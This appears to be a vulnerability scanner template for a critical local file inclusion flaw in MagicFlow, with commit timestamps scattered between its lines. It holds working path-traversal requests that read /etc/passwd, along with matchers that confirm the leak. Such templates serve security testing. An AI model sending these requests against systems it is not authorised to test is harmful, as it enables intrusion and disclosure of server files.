2021-07-21 05:18:00 +00:00
id : magicflow-lfi
info :
name : MagicFlow - Local File Inclusion
author : gy741
severity : critical
2021-10-19 10:10:34 +00:00
description : A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
2021-07-21 05:18:00 +00:00
reference : https://www.seebug.org/vuldb/ssvid-89258
tags : magicflow,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
- "{{BaseURL}}/msa/../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-07-21 05:18:00 +00:00
- type : status
status :
- 200